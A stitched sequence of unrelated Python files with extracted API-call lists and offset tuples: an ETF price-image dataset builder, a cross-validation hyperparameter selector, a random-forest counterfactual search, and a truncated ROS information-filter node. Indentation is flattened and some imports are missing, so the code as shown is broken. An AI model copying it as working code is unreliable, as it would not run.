from PIL import Image
import os
import h5py
#dates parameters
str_dte = '2003-01-01'
end_dte = '2018-7-31'
date_dict = {'gte':str_dte, 'lte':end_dte}
#quandl setting
quandl.ApiConfig.api_key = QUANDLKEY
col_num_mid = 10
col_num_dte = 9
#parameters for the image generation
pixel_size = 100
window_size = 60
pred_window_size = 1
num_channel = 1
#create path for the output dataset
folder_path = os.path.dirname(__file__)
data_X_dir = os.path.join(folder_path,'dataset')
data_Y_dir = os.path.join(folder_path,'dataset')
#ticker lists
#tkr_list = ['TIPX','HYMB','TFI','ULST','MBG','FLRN','SHM','STOT','SPTS','BIL','SPSB']
tkr_list = ['DWX','TIPX','FLRN','CBND','SJNK','SRLN','CJNK','DWFI','EMTL','STOT','TOTL','DIA','SMEZ','XITK','GLDM','GLD','XKFS','XKII','XKST','GLDW','SYE','SYG','SYV','LOWC','ZCAN','XINA','EFAX','QEFA','EEMX','QEMM','ZDEU','ZHOK','ZJPN','ZGBR','QUS','QWLD','OOO','LGLV','ONEV','ONEO','ONEY','SPSM','SMLV','MMTM','VLU','SPY','SPYX','SPYD','SPYB','WDIV','XWEB','MDY','NANR','XTH','SHE','GAL','INKM','RLY','ULST','BIL','CWB','EBND','JNK','ITE','IBND','BWX','SPTL','MBG','BWZ','IPE','WIP','RWO','RWX','RWR','FEZ','DGT','XNTK','CWI','ACIM','TFI','SHM','HYMB','SPAB','SPDW','SPEM','SPIB','SPLG','SPLB','SPMD','SPSB','SPTS','SPTM','MDYG','MDYV','SPYG','SPYV','SLY','SLYG','SLYV','KBE','KCE','GII','KIE','KRE','XAR','XBI','GXC','SDY','GMF','EDIV','EWX','GNR','XHE','XHS','XHB','GWX','XME','XES','XOP','XPH','XRT','XSD','XSW','XTL','XTN','FEU','PSK']
#generate png file for each of the input or now
img_output = False
#generate interactive plot to the ticket stock price or not
gen_plot = False
'''*************************************
#2. Define the function to rescale the stock price according to the min and max values
'''
#input_X is a series of price
#output_X is a series of price expressed in pixel
def rescale(input_X, pixel, min_x,max_x):
unit = (max_x - min_x)/pixel
output_X = round((input_X-min_x)/unit,0)
return output_X,unit
'''*************************************
#3. Go through the tickers
'''
for tkr in tkr_list:
print(tkr)
#if the ticker has been downloaded, skip the ticket and go for the next one
if os.path.exists(tkr+'6b1_completed.txt'):
continue
#download and create dataset
    df = quandl.get_table('SHARADAR/SFP', date=date_dict, ticker=tkr)
#sort the date from ascending to descending...
df = df.sort_values(by=['date'])
df=df.reset_index(drop=True)
#charting interactive chart for viewing the data
if gen_plot == True:
trace = go.Candlestick(x=df.date,
open=df.open,
high=df.high,
low=df.low,
close=df.close)
data = [trace]
plotly.offline.plot(data, filename=tkr+'simple_candlestick')
#calculate mid price of the day
df['mid'] = (df['high'] + df['low'])/2
len_df = len(df)
num_img = max(int(len_df-window_size-1),0)
current_min_dte = df.date
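    # one training image per sliding window: (num_img, pixel_size, window_size, num_channel)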
train_shape = (num_img, pixel_size, window_size,num_channel)
label_shape = (num_img, pixel_size)
#remove the file if there is one
data_X_path = os.path.join(data_X_dir,tkr+'X_img.h5')
try:
os.remove(data_X_path)
except OSError:
pass
h5f_X = h5py.File(data_X_path,'w')
#remove the file if there is one
data_Y_path = os.path.join(data_Y_dir,tkr+'Y_label.h5')
try:
os.remove(data_Y_path)
except OSError:
pass
h5f_Y = h5py.File(data_Y_path,'w')
#create dataset within the HDF5 file
#now we create the dataset with a fixed size to fit all the data, it could also be create to fit fixed batches
h5f_X.create_dataset("X_img_ds", train_shape, np.float32)
h5f_Y.create_dataset("Y_label_ds", label_shape, np.float32)
#loop through the dates
for i in range(num_img):
img_ar = np.zeros((pixel_size,window_size,1))
        result_Y = np.zeros(pixel_size)
df_plot = df.iloc[i:window_size+i,:]
#create min and max values for the mid price plot within a given timeframe
min_p = min(df_plot['mid'])
max_p = max(df_plot['mid'])
output_pixel,unit = rescale(df_plot['mid'],pixel_size,min_p,max_p)
df_next = df.iloc[window_size+i+1,:]
next_p = df_next['mid']
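        # clamp the pixel unit to avoid division by zero when prices are flat in the window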
unit = max(unit,0.000001)
next_p_val = max(round((min(next_p,max_p)-min_p)/unit,0),0)
#in case of low liquidity ETF which has the same price, no graph be drawn
if min_p ==max_p:
continue
k = 0
#draw the dot on the x, y axis of the input image array
for pix in output_pixel:
img_ar[int(pix)-1][k][0] = 255
k+=1
#output the image for visualization
if img_output:
            img = Image.fromarray(img_ar[:, :, 0].astype(np.uint8)) # drop the channel axis and cast to uint8 so PIL can build the image
if img.mode != 'RGB':
new_img = img.convert('RGB')
file_path = os.path.join(folder_path,'img/'+tkr+str(i)+'.png')
new_img.save(file_path,"PNG")
img_row = img_ar/255
#draw the dot on the target image for training
result_Y[int(next_p_val)-1] = 255
result_Y_row=result_Y/255
#stack up for a numpy for Image Recognition
h5f_X["X_img_ds"][i, ...] = img_row
h5f_Y["Y_label_ds"][i, ...] = result_Y_row
if i == 0:
np_X = img_row
np_Y = result_Y_row
else:
np_X = np.vstack((np_X,img_row))
np_Y = np.vstack((np_Y,result_Y_row))
f_tkr=open(tkr+'6b1_completed.txt','w+')
f_tkr.close()
h5f_X.close()
h5f_Y.close()
#generate the message to the directory to signal the completion of this task
f=open('6b1_completed.txt','w+')
f.close()
|
[
"h5py.File",
"os.remove",
"os.path.dirname",
"os.path.exists",
"numpy.zeros",
"plotly.offline.plot",
"quandl.get_table",
"plotly.graph_objs.Candlestick",
"PIL.Image.fromarray",
"os.path.join",
"numpy.vstack"
] |
[((791, 816), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (806, 816), False, 'import os\n'), ((830, 866), 'os.path.join', 'os.path.join', (['folder_path', '"""dataset"""'], {}), "(folder_path, 'dataset')\n", (842, 866), False, 'import os\n'), ((879, 915), 'os.path.join', 'os.path.join', (['folder_path', '"""dataset"""'], {}), "(folder_path, 'dataset')\n", (891, 915), False, 'import os\n'), ((2563, 2604), 'os.path.exists', 'os.path.exists', (["(tkr + '6b1_completed.txt')"], {}), "(tkr + '6b1_completed.txt')\n", (2577, 2604), False, 'import os\n'), ((2667, 2727), 'quandl.get_table', 'quandl.get_table', (['"""SHARADAR/SFP"""'], {'date': 'date_dict', 'ticker': 'tkr'}), "('SHARADAR/SFP', date=date_dict, ticker=tkr)\n", (2683, 2727), False, 'import quandl\n'), ((3593, 3635), 'os.path.join', 'os.path.join', (['data_X_dir', "(tkr + 'X_img.h5')"], {}), "(data_X_dir, tkr + 'X_img.h5')\n", (3605, 3635), False, 'import os\n'), ((3718, 3745), 'h5py.File', 'h5py.File', (['data_X_path', '"""w"""'], {}), "(data_X_path, 'w')\n", (3727, 3745), False, 'import h5py\n'), ((3801, 3845), 'os.path.join', 'os.path.join', (['data_Y_dir', "(tkr + 'Y_label.h5')"], {}), "(data_Y_dir, tkr + 'Y_label.h5')\n", (3813, 3845), False, 'import os\n'), ((3928, 3955), 'h5py.File', 'h5py.File', (['data_Y_path', '"""w"""'], {}), "(data_Y_path, 'w')\n", (3937, 3955), False, 'import h5py\n'), ((2946, 3032), 'plotly.graph_objs.Candlestick', 'go.Candlestick', ([], {'x': 'df.date', 'open': 'df.open', 'high': 'df.high', 'low': 'df.low', 'close': 'df.close'}), '(x=df.date, open=df.open, high=df.high, low=df.low, close=df.\n close)\n', (2960, 3032), True, 'import plotly.graph_objs as go\n'), ((3184, 3246), 'plotly.offline.plot', 'plotly.offline.plot', (['data'], {'filename': "(tkr + 'simple_candlestick')"}), "(data, filename=tkr + 'simple_candlestick')\n", (3203, 3246), False, 'import plotly\n'), ((3650, 3672), 'os.remove', 'os.remove', (['data_X_path'], {}), '(data_X_path)\n', (3659, 3672), False, 'import os\n'), ((3860, 3882), 'os.remove', 'os.remove', (['data_Y_path'], {}), '(data_Y_path)\n', (3869, 3882), False, 'import os\n'), ((4325, 4363), 'numpy.zeros', 'np.zeros', (['(pixel_size, window_size, 1)'], {}), '((pixel_size, window_size, 1))\n', (4333, 4363), True, 'import numpy as np\n'), ((4380, 4400), 'numpy.zeros', 'np.zeros', (['pixel_size'], {}), '(pixel_size)\n', (4388, 4400), True, 'import numpy as np\n'), ((5262, 5285), 'PIL.Image.fromarray', 'Image.fromarray', (['img_ar'], {}), '(img_ar)\n', (5277, 5285), False, 'from PIL import Image\n'), ((5947, 5973), 'numpy.vstack', 'np.vstack', (['(np_X, img_row)'], {}), '((np_X, img_row))\n', (5956, 5973), True, 'import numpy as np\n'), ((5992, 6023), 'numpy.vstack', 'np.vstack', (['(np_Y, result_Y_row)'], {}), '((np_Y, result_Y_row))\n', (6001, 6023), True, 'import numpy as np\n')]
|
# PACKAGES
import numpy as np
import os
from scipy import stats as ss
import pickle
import h5py
import pandas as pd
from configs import *
path_to_results_folder = "%sresults/"%CV_save_path
path_to_preds_folder = "%spredictions/"%CV_save_path
path_to_final_chosen_models = "%sfinal_models_chosen/"%CV_save_path
if not os.path.isdir(path_to_final_chosen_models):
os.makedirs(path_to_final_chosen_models)
#### Compute test set variances
variances = {}
tmp_fname = os.listdir(path_to_preds_folder + "MTL/" + split_pca_dataset + "/")[0]
for variable in phenotypes:
vars_by_split = []
for fold_idx in range(25,30):
path_to_preds = path_to_preds_folder + "MTL/%s/%s/%d.h5"%(split_pca_dataset, tmp_fname, fold_idx)
with h5py.File(path_to_preds, 'r') as hf:
true_vals = hf["y_true"][variable][:]
vars_by_split.append(np.nanvar(true_vals))
variances[variable] = np.array(vars_by_split)
def MTL_get_CV_test_res_as_df(path_to_log_files):
firstfile = os.listdir(path_to_log_files)[0]
cols = pd.read_csv(path_to_log_files + firstfile).columns
test_runs = []
for i in range(5):
# the first 25 files are CV folds
cur_idx = 25+i
test_runs.append(pd.read_csv(path_to_log_files + "%d.log"%cur_idx))
test_overall_averages = pd.DataFrame(np.nanmean(np.array([test_runs[i].values for i in range(5)]),axis=0), columns=cols)
return test_runs, test_overall_averages
#################################################
############### MD-AD ##########################
#################################################
performances = {}
for var in phenotypes:
performances[var] = {}
for fname in os.listdir(path_to_results_folder + "MTL/" + split_pca_dataset):
        test_runs, test_overall_averages = MTL_get_CV_test_res_as_df(path_to_results_folder + "MTL/" + split_pca_dataset + "/" + fname + "/")
performances[var][fname] = []
for foldidx in range(5):
# we want the min loss, and we scale by variance
test_var = variances[var][foldidx]
performances[var][fname].append(np.min(test_runs[foldidx]["val_%s_out_loss"%var])/test_var)
fnames = os.listdir(path_to_results_folder + "MTL/" + split_pca_dataset)
num_hy = len(fnames)
############ Choose final model within each CV split ##################
FOLD_performances = {}
for fold_idx in range(5):
FOLD_performances[fold_idx] = {}
for key1 in performances.keys():
FOLD_performances[fold_idx][key1] = []
for key2 in performances[key1].keys():
FOLD_performances[fold_idx][key1].append(performances[key1][key2][fold_idx])
FOLD_rankings = {}
for fold_idx in range(5):
FOLD_rankings[fold_idx] = {}
for phenotype in FOLD_performances[fold_idx].keys():
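        # if every value is NaN for this phenotype, assign zero ranks so it does not influence model selection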
if np.sum(~np.isnan(FOLD_performances[fold_idx][phenotype])) == 0:
FOLD_rankings[fold_idx][phenotype] = np.zeros(num_hy)
continue
FOLD_rankings[fold_idx][phenotype] = ss.rankdata(FOLD_performances[fold_idx][phenotype])
FOLD_sum_of_ranks = {}
for fold_idx in range(5):
FOLD_sum_of_ranks[fold_idx] = np.zeros(num_hy)
for phenotype in FOLD_rankings[fold_idx].keys():
FOLD_sum_of_ranks[fold_idx] += FOLD_rankings[fold_idx][phenotype]
final_models_dict = {}
for fold_idx in range(5):
final_models_dict[25+fold_idx] = fnames[np.argmin(FOLD_sum_of_ranks[fold_idx])]
if not os.path.isdir(path_to_final_chosen_models + "MTL/"):
os.makedirs(path_to_final_chosen_models + "MTL/")
pickle.dump(final_models_dict, open( path_to_final_chosen_models+"MTL/folds.p", "wb" ) )
############ Choose final model overall (for retraining with all data) ##################
AVG_performances = {}
for key1 in performances.keys():
AVG_performances[key1] = {}
for key2 in performances[key1].keys():
AVG_performances[key1][key2] = np.nanmean(performances[key1][key2])
fnames_performances = {}
for phenotype in AVG_performances.keys():
fnames_performances[phenotype] = []
for fname in fnames:
fnames_performances[phenotype].append(AVG_performances[phenotype][fname])
fnames_rankings = {}
for phenotype in fnames_performances.keys():
fnames_rankings[phenotype] = ss.rankdata(fnames_performances[phenotype])
sum_of_ranks = np.zeros(len(fnames))
for phenotype in fnames_rankings.keys():
sum_of_ranks += fnames_rankings[phenotype]
pickle.dump(fnames[np.argmin(sum_of_ranks)], open( path_to_final_chosen_models+"MTL/final.p", "wb" ) )
#################################################
################ MLPs ##########################
#################################################
performances = {}
for var in phenotypes:
performances[var] = {}
for fname in os.listdir(path_to_results_folder + "MLP_baselines/" + split_pca_dataset):
test_runs, test_overall_avergaes = MTL_get_CV_test_res_as_df("%sMLP_baselines/%s/%s/%s/"%(path_to_results_folder,split_pca_dataset, fname,var))
performances[var][fname] = []
for foldidx in range(5):
# we want the min loss, and we scale by variance
test_performance = np.min(test_runs[foldidx]["val_loss"])/variances[var][foldidx]
performances[var][fname].append(test_performance)
############ Choose final model within each CV split ##################
FOLD_performances = {}
for fold_idx in range(5):
FOLD_performances[fold_idx] = {}
for key1 in performances.keys():
FOLD_performances[fold_idx][key1] = []
for key2 in performances[key1].keys():
FOLD_performances[fold_idx][key1].append(performances[key1][key2][fold_idx])
FOLD_rankings = {}
for fold_idx in range(5):
FOLD_rankings[fold_idx] = {}
for phenotype in FOLD_performances[fold_idx].keys():
if np.sum(~np.isnan(FOLD_performances[fold_idx][phenotype])) == 0:
FOLD_rankings[fold_idx][phenotype] = np.zeros(len(fnames))
continue
FOLD_rankings[fold_idx][phenotype] = ss.rankdata(FOLD_performances[fold_idx][phenotype])
final_models = {}
for fold_idx in range(5):
final_models[25+fold_idx] = {}
for phenotype in FOLD_rankings[fold_idx].keys():
final_models[25+fold_idx][phenotype] = fnames[np.argmin(FOLD_rankings[fold_idx][phenotype])]
if not os.path.isdir(path_to_final_chosen_models + "MLP_baselines/"):
os.makedirs(path_to_final_chosen_models + "MLP_baselines/")
pickle.dump(final_models, open( path_to_final_chosen_models+"MLP_baselines/folds.p", "wb" ) )
############ Choose final model overall (for retraining with all data) ##################
FOLD_sum_of_ranks = {}
for fold_idx in range(5):
FOLD_sum_of_ranks[fold_idx] = np.zeros(len(fnames))
for phenotype in FOLD_rankings[fold_idx].keys():
FOLD_sum_of_ranks[fold_idx] += FOLD_rankings[fold_idx][phenotype]
AVG_performances = {}
for key1 in performances.keys():
AVG_performances[key1] = {}
for key2 in performances[key1].keys():
AVG_performances[key1][key2] = np.nanmean(performances[key1][key2])
fnames_performances = {}
for phenotype in AVG_performances.keys():
fnames_performances[phenotype] = []
for fname in fnames:
fnames_performances[phenotype].append(AVG_performances[phenotype][fname])
fnames_rankings = {}
for phenotype in fnames_performances.keys():
fnames_rankings[phenotype] = ss.rankdata(fnames_performances[phenotype])
final_final_mlp_baselines = {}
for phenotype in fnames_rankings.keys():
final_final_mlp_baselines[phenotype]= fnames[np.argmin(fnames_rankings[phenotype])]
pickle.dump(final_final_mlp_baselines, open( path_to_final_chosen_models+"MLP_baselines/final.p", "wb" ) )
print("Saved selected hyperparameters to folder: %s"%path_to_final_chosen_models)
|
[
"h5py.File",
"os.makedirs",
"os.path.isdir",
"pandas.read_csv",
"numpy.zeros",
"scipy.stats.rankdata",
"numpy.argmin",
"numpy.isnan",
"numpy.min",
"numpy.array",
"numpy.nanvar",
"os.listdir",
"numpy.nanmean"
] |
[((2245, 2308), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MTL/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MTL/' + split_pca_dataset)\n", (2255, 2308), False, 'import os\n'), ((324, 366), 'os.path.isdir', 'os.path.isdir', (['path_to_final_chosen_models'], {}), '(path_to_final_chosen_models)\n', (337, 366), False, 'import os\n'), ((372, 412), 'os.makedirs', 'os.makedirs', (['path_to_final_chosen_models'], {}), '(path_to_final_chosen_models)\n', (383, 412), False, 'import os\n'), ((484, 551), 'os.listdir', 'os.listdir', (["(path_to_preds_folder + 'MTL/' + split_pca_dataset + '/')"], {}), "(path_to_preds_folder + 'MTL/' + split_pca_dataset + '/')\n", (494, 551), False, 'import os\n'), ((928, 951), 'numpy.array', 'np.array', (['vars_by_split'], {}), '(vars_by_split)\n', (936, 951), True, 'import numpy as np\n'), ((1718, 1781), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MTL/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MTL/' + split_pca_dataset)\n", (1728, 1781), False, 'import os\n'), ((3238, 3254), 'numpy.zeros', 'np.zeros', (['num_hy'], {}), '(num_hy)\n', (3246, 3254), True, 'import numpy as np\n'), ((3538, 3589), 'os.path.isdir', 'os.path.isdir', (["(path_to_final_chosen_models + 'MTL/')"], {}), "(path_to_final_chosen_models + 'MTL/')\n", (3551, 3589), False, 'import os\n'), ((3595, 3644), 'os.makedirs', 'os.makedirs', (["(path_to_final_chosen_models + 'MTL/')"], {}), "(path_to_final_chosen_models + 'MTL/')\n", (3606, 3644), False, 'import os\n'), ((4351, 4394), 'scipy.stats.rankdata', 'ss.rankdata', (['fnames_performances[phenotype]'], {}), '(fnames_performances[phenotype])\n', (4362, 4394), True, 'from scipy import stats as ss\n'), ((4876, 4949), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MLP_baselines/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MLP_baselines/' + split_pca_dataset)\n", (4886, 4949), False, 'import os\n'), ((6479, 6540), 'os.path.isdir', 'os.path.isdir', (["(path_to_final_chosen_models + 'MLP_baselines/')"], {}), "(path_to_final_chosen_models + 'MLP_baselines/')\n", (6492, 6540), False, 'import os\n'), ((6546, 6605), 'os.makedirs', 'os.makedirs', (["(path_to_final_chosen_models + 'MLP_baselines/')"], {}), "(path_to_final_chosen_models + 'MLP_baselines/')\n", (6557, 6605), False, 'import os\n'), ((7589, 7632), 'scipy.stats.rankdata', 'ss.rankdata', (['fnames_performances[phenotype]'], {}), '(fnames_performances[phenotype])\n', (7600, 7632), True, 'from scipy import stats as ss\n'), ((1029, 1058), 'os.listdir', 'os.listdir', (['path_to_log_files'], {}), '(path_to_log_files)\n', (1039, 1058), False, 'import os\n'), ((1073, 1115), 'pandas.read_csv', 'pd.read_csv', (['(path_to_log_files + firstfile)'], {}), '(path_to_log_files + firstfile)\n', (1084, 1115), True, 'import pandas as pd\n'), ((3093, 3144), 'scipy.stats.rankdata', 'ss.rankdata', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (3104, 3144), True, 'from scipy import stats as ss\n'), ((3481, 3519), 'numpy.argmin', 'np.argmin', (['FOLD_sum_of_ranks[fold_idx]'], {}), '(FOLD_sum_of_ranks[fold_idx])\n', (3490, 3519), True, 'import numpy as np\n'), ((3999, 4035), 'numpy.nanmean', 'np.nanmean', (['performances[key1][key2]'], {}), '(performances[key1][key2])\n', (4009, 4035), True, 'import numpy as np\n'), ((4549, 4572), 'numpy.argmin', 'np.argmin', (['sum_of_ranks'], {}), '(sum_of_ranks)\n', (4558, 4572), True, 'import numpy as np\n'), ((6185, 6236), 'scipy.stats.rankdata', 'ss.rankdata', 
(['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (6196, 6236), True, 'from scipy import stats as ss\n'), ((7229, 7265), 'numpy.nanmean', 'np.nanmean', (['performances[key1][key2]'], {}), '(performances[key1][key2])\n', (7239, 7265), True, 'import numpy as np\n'), ((7759, 7796), 'numpy.argmin', 'np.argmin', (['fnames_rankings[phenotype]'], {}), '(fnames_rankings[phenotype])\n', (7768, 7796), True, 'import numpy as np\n'), ((759, 788), 'h5py.File', 'h5py.File', (['path_to_preds', '"""r"""'], {}), "(path_to_preds, 'r')\n", (768, 788), False, 'import h5py\n'), ((876, 896), 'numpy.nanvar', 'np.nanvar', (['true_vals'], {}), '(true_vals)\n', (885, 896), True, 'import numpy as np\n'), ((1257, 1308), 'pandas.read_csv', 'pd.read_csv', (["(path_to_log_files + '%d.log' % cur_idx)"], {}), "(path_to_log_files + '%d.log' % cur_idx)\n", (1268, 1308), True, 'import pandas as pd\n'), ((3001, 3017), 'numpy.zeros', 'np.zeros', (['num_hy'], {}), '(num_hy)\n', (3009, 3017), True, 'import numpy as np\n'), ((6424, 6469), 'numpy.argmin', 'np.argmin', (['FOLD_rankings[fold_idx][phenotype]'], {}), '(FOLD_rankings[fold_idx][phenotype])\n', (6433, 6469), True, 'import numpy as np\n'), ((5267, 5305), 'numpy.min', 'np.min', (["test_runs[foldidx]['val_loss']"], {}), "(test_runs[foldidx]['val_loss'])\n", (5273, 5305), True, 'import numpy as np\n'), ((2149, 2200), 'numpy.min', 'np.min', (["test_runs[foldidx]['val_%s_out_loss' % var]"], {}), "(test_runs[foldidx]['val_%s_out_loss' % var])\n", (2155, 2200), True, 'import numpy as np\n'), ((2896, 2944), 'numpy.isnan', 'np.isnan', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (2904, 2944), True, 'import numpy as np\n'), ((5983, 6031), 'numpy.isnan', 'np.isnan', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (5991, 6031), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import copy
import scipy.stats
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
"""
define basic functions for AFT1
"""
def search_path(estimator, y_threshold):
"""
return path index list containing
[{leaf node id, inequality symbol, threshold, feature index}].
estimator: decision tree
    y_threshold: leaf nodes whose predicted value is >= y_threshold are selected
"""
""" select leaf nodes whose outcome is aim_label """
# information of left child node
children_left = estimator.tree_.children_left
children_right = estimator.tree_.children_right
feature = estimator.tree_.feature
threshold = estimator.tree_.threshold
# leaf nodes ID
leaf_nodes = np.where(children_left == -1)[0]
leaf_nodes = [
i for i in leaf_nodes if estimator.tree_.value[i] >= y_threshold]
""" search the path to the selected leaf node """
paths = {}
for leaf_node in leaf_nodes:
""" correspond leaf node to left and right parents """
child_node = leaf_node
parent_node = -100 # initialize
        parents_left = [] # left-side parent nodes
        parents_right = [] # right-side parent nodes
while (parent_node != 0):
if (np.where(children_left == child_node)[0].shape == (0, )):
                parent_left = -1 # -1 when there is no left-side parent node
parent_right = np.where(
children_right == child_node)[0][0]
parent_node = parent_right
elif (np.where(children_right == child_node)[0].shape == (0, )):
                parent_right = -1 # -1 when there is no right-side parent node
parent_left = np.where(children_left == child_node)[0][0]
parent_node = parent_left
parents_left.append(parent_left)
parents_right.append(parent_right)
""" for next step """
child_node = parent_node
# nodes dictionary containing left parents and right parents
paths[leaf_node] = (parents_left, parents_right)
path_info = {}
for i in paths:
node_ids = [] # node ids used in the current node
# inequality symbols used in the current node
inequality_symbols = []
        thresholds = [] # thresholds used in the current node
features = [] # features used in the current node
parents_left, parents_right = paths[i]
for idx in range(len(parents_left)):
if (parents_left[idx] != -1):
""" the child node is the left child of the parent """
node_id = parents_left[idx] # node id
node_ids.append(node_id)
inequality_symbols.append(0)
thresholds.append(threshold[node_id])
features.append(feature[node_id])
elif (parents_right[idx] != -1):
""" the child node is the right child of the parent """
node_id = parents_right[idx]
node_ids.append(node_id)
inequality_symbols.append(1)
thresholds.append(threshold[node_id])
features.append(feature[node_id])
path_info[i] = {'node_id': node_ids[::-1],
'inequality_symbol': inequality_symbols[::-1],
'threshold': thresholds[::-1],
'feature': features[::-1]}
return path_info
def esatisfactory_instance(x, epsilon, path_info):
"""
return the epsilon satisfactory instance of x.
"""
esatisfactory = copy.deepcopy(x)
for feature_idx in np.unique(path_info['feature']):
""" loop by each feature -- i is feature index (feature name). """
positions = np.where(np.array(path_info['feature'])==feature_idx)[0] # positions of path_information list
theta_upp = float('inf')
theta_low = -float('inf')
for posi in positions:
if path_info['inequality_symbol'][posi]==0:
""" posiが大きいほど厳しい条件になるので,順番に更新していくだけで良い """
theta_upp = path_info['threshold'][posi] # upper bounded threshold
elif path_info['inequality_symbol'][posi]==1:
theta_low = path_info['threshold'][posi] # lower bounded threshold
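        # pick a feature value inside the interval (theta_low, theta_upp) implied by the path conditions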
if theta_low == -float('inf'):
esatisfactory[feature_idx] = theta_upp - epsilon
elif theta_upp == float('inf'):
esatisfactory[feature_idx] = theta_low + epsilon
else:
esatisfactory[feature_idx] = (theta_low + theta_upp)/2
return esatisfactory
def transam(ensemble_regressor, x, y_threshold, epsilon, cost_func):
"""
x: feature vector
y_threshold: threshold value to select the positive path
"""
""" initialize """
x_out = copy.deepcopy(x) # initialize output
delta_mini = 10**3 # initialize cost
check_cnt = 0 # check whether epsilon satisfactory instance is updated
for estimator in ensemble_regressor:
if (ensemble_regressor.predict(x.reshape(1, -1)) < y_threshold
and estimator.predict(x.reshape(1, -1)) < y_threshold):
paths_info = search_path(estimator, y_threshold)
for key in paths_info:
""" generate epsilon-satisfactory instance """
path_info = paths_info[key]
es_instance = esatisfactory_instance(x, epsilon, path_info)
if ensemble_regressor.predict(es_instance.reshape(1, -1)) > y_threshold:
if cost_func(x, es_instance) < delta_mini:
x_out = es_instance
delta_mini = cost_func(x, es_instance)
check_cnt += 1 # add update counter
else:
continue
return x_out
|
[
"copy.deepcopy",
"numpy.where",
"numpy.array",
"numpy.unique"
] |
[((3546, 3562), 'copy.deepcopy', 'copy.deepcopy', (['x'], {}), '(x)\n', (3559, 3562), False, 'import copy\n'), ((3586, 3617), 'numpy.unique', 'np.unique', (["path_info['feature']"], {}), "(path_info['feature'])\n", (3595, 3617), True, 'import numpy as np\n'), ((4761, 4777), 'copy.deepcopy', 'copy.deepcopy', (['x'], {}), '(x)\n', (4774, 4777), False, 'import copy\n'), ((758, 787), 'numpy.where', 'np.where', (['(children_left == -1)'], {}), '(children_left == -1)\n', (766, 787), True, 'import numpy as np\n'), ((3723, 3753), 'numpy.array', 'np.array', (["path_info['feature']"], {}), "(path_info['feature'])\n", (3731, 3753), True, 'import numpy as np\n'), ((1244, 1281), 'numpy.where', 'np.where', (['(children_left == child_node)'], {}), '(children_left == child_node)\n', (1252, 1281), True, 'import numpy as np\n'), ((1387, 1425), 'numpy.where', 'np.where', (['(children_right == child_node)'], {}), '(children_right == child_node)\n', (1395, 1425), True, 'import numpy as np\n'), ((1514, 1552), 'numpy.where', 'np.where', (['(children_right == child_node)'], {}), '(children_right == child_node)\n', (1522, 1552), True, 'import numpy as np\n'), ((1658, 1695), 'numpy.where', 'np.where', (['(children_left == child_node)'], {}), '(children_left == child_node)\n', (1666, 1695), True, 'import numpy as np\n')]
|
#!/usr/bin/env python2
from __future__ import print_function
import roslib
import sys
import rospy
import numpy as np
import datetime
import time
import os
import pickle
from geometry_msgs.msg import PoseArray
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseWithCovariance
from std_msgs.msg import Bool
from nav_msgs.msg import Odometry
from dse_msgs.msg import PoseMarkers
from std_msgs.msg import Float64MultiArray
from std_msgs.msg import MultiArrayLayout
from std_msgs.msg import MultiArrayDimension
from dse_msgs.msg import InfFilterResults
from visualization_msgs.msg import Marker
from scipy.spatial.transform import Rotation as R
from gazebo_msgs.msg import LinkStates
import tf_conversions
import tf2_ros
import matplotlib.pyplot as plt
import gazebo_lib
import dse_lib
import dse_constants
roslib.load_manifest('dse_simulation')
class information_filter:
# Define initial/setup values
def __init__(self):
self.time = []
self.true_poses = []
self.est_poses = []
self.est_covariances = []
# # Get parameters from launch file
# self.ros_prefix = rospy.get_param('~prefix')
# if len(self.ros_prefix) != 0 and self.ros_prefix[0] != '/':
# self.ros_prefix = '/' + self.ros_prefix
# self.tf_pretix = self.ros_prefix[1:]
# self.dim_state = rospy.get_param('~dim_state')
# Get parameters from launch file
# self.n_params = 3
# self.dim_state = 6
# self.object_names = ['tb3_0', 'tb3_1', 'tb3_2']
# self.object_ids = [5, 6, 7]
# self.agent_ids = [5, 6, 7]
# self.dim_state = 6
self.object_names = rospy.get_param('~objects')
self.object_ids = rospy.get_param('~object_ids')
self.agent_ids = rospy.get_param('~agent_ids')
self.dim_state = rospy.get_param('~dim_state', 6)
n_params = len(self.agent_ids)
self.store_data_sub = rospy.Subscriber('/store_data', Bool, self.store_data)
self.gazebo_model_object = gazebo_lib.GazeboModel(self.object_names)
self.inf_results_subs = []
self.agent_names = []
for i in range(n_params):
index = self.object_ids.index(self.agent_ids[i])
self.agent_names.append(self.object_names[index])
if len(self.agent_names[i]) != 0 and self.agent_names[i][0] != '/':
self.agent_names[i] = '/' + self.agent_names[i]
self.inf_results_subs.append(rospy.Subscriber(
self.agent_names[i] + "/dse/inf/results", InfFilterResults, self.results_callback, i))
self.time.append([])
self.true_poses.append([])
self.est_poses.append([])
self.est_covariances.append([])
if self.dim_state == 6:
self.dim_obs = 3
elif self.dim_state == 12:
self.dim_obs = 6
else:
rospy.signal_shutdown('invalid state dimension passed in')
# Create pose_array for the information results
def results_callback(self, data, agent_index):
inf_id_list = np.array(data.ids)
inf_Y = dse_lib.multi_array_2d_output(data.inf_matrix)
inf_y = dse_lib.multi_array_2d_output(data.inf_vector)
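        # recover the state estimate x = Y^-1 y and covariance P = Y^-1 from the information form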
self.inf_x = np.linalg.inv(inf_Y).dot(inf_y)
inf_P = np.linalg.inv(inf_Y)
est_pose = []
true_pose = []
est_covariance = []
for id in inf_id_list:
name_index = self.object_ids.index(id)
name = self.object_names[name_index]
i = np.where(inf_id_list == id)[0][0]
i_min = i * self.dim_state
i_max = i_min + self.dim_state
this_pose = dse_lib.pose_from_state_3D(self.inf_x[i_min:i_max])
this_xyy = dse_lib.state_to_xyzypr(dse_lib.state_from_pose_3D(this_pose))
# if this_xyy[2] - 1.5707633 < 0.0001:
# print('weird error')
est_pose.append(this_xyy)
